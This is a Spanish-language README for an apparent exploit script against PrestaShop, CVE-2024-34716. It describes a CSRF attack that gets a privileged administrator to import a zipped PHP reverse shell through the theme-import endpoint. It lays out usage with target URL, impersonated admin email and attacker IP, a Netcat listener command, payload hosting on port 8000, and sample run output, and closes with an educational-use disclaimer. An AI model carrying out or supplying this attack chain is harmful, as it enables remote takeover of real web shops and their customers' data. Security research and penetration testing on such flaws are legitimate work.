
Automatiza un ataque CSRF contra CVE-2024-34716 para desplegar una reverse shell en PHP en PrestaShop, con empaquetado automatizado del payload y configuración del listener de Netcat.
Este script automatiza un exploit de CSRF (Falsificación de Petición en Sitios Cruzados) para cargar un reverse shell PHP en el servidor web de un objetivo y ejecutarlo. El reverse shell se entrega como un archivo ZIP mediante un payload CSRF diseñado, que se activa cuando un usuario privilegiado interactúa con un endpoint específico. El script requiere una instancia de Netcat a la escucha para capturar la conexión del reverse shell.
Parece estar roto por ahora, se actualizará más tarde
./exploit.sh <target_url> <admin_endpoint> <admin_email> <attacker_ip>
target_url: URL base del objetivo (ej., https://example.com).admin_endpoint: Ruta al endpoint de importación de tema del administrador.admin_email: Dirección de correo de un administrador (para suplantar en el payload).attacker_ip: Dirección IP donde el listener del reverse shell recibirá la conexión../exploit.sh https://victim.com /admin-panel [email protected] 192.168.1.10
attacker_ip y el puerto 9001 proporcionados.love.php) se comprime en Love-exploit.zip.csrf_payload.html) que contiene un script JavaScript para enviar automáticamente una solicitud maliciosa al panel de administración del objetivo e importar el reverse shell.8000 sirve Love-exploit.zip para que el objetivo lo importe.Inicia un listener de Netcat en tu máquina:
nc -nvlp 9001
Ejecuta el script:
./exploit.sh https://victim.com /admin-panel [email protected] 192.168.1.10
Espera a que el objetivo ejecute el payload CSRF y recibe la conexión del reverse shell.
El script muestra la siguiente información durante la ejecución:
8000 (servidor HTTP) y 9001 (listener de Netcat) estén libres antes de ejecutar el script.[*] Ensure Netcat is listening: nc -nvlp 9001
[*] Awaiting netcat listener...
[*] Creating PHP reverse shell...
[*] Packaging shell as Love-exploit.zip...
[*] Fetching CSRF token...
[+] CSRF token retrieved: <token_value>
[*] Building HTML payload for CSRF...
[*] Converting HTML to PNG...
[*] Checking for existing HTTP server on port 8000...
[*] Starting new HTTP server on port 8000 for payload delivery...
[*] Uploading XSS payload to trigger CSRF...
[*] Keeping script running to monitor for incoming connections...
Este documento está destinado al uso por parte de probadores de penetración e investigadores de ciberseguridad en entornos controlados. El mal uso de esta herramienta para fines no autorizados está estrictamente prohibido.
Este script es solo para fines educativos y evaluaciones legales de ciberseguridad. El uso no autorizado contra un sistema sin permiso es ilegal y va en contra de las pautas éticas.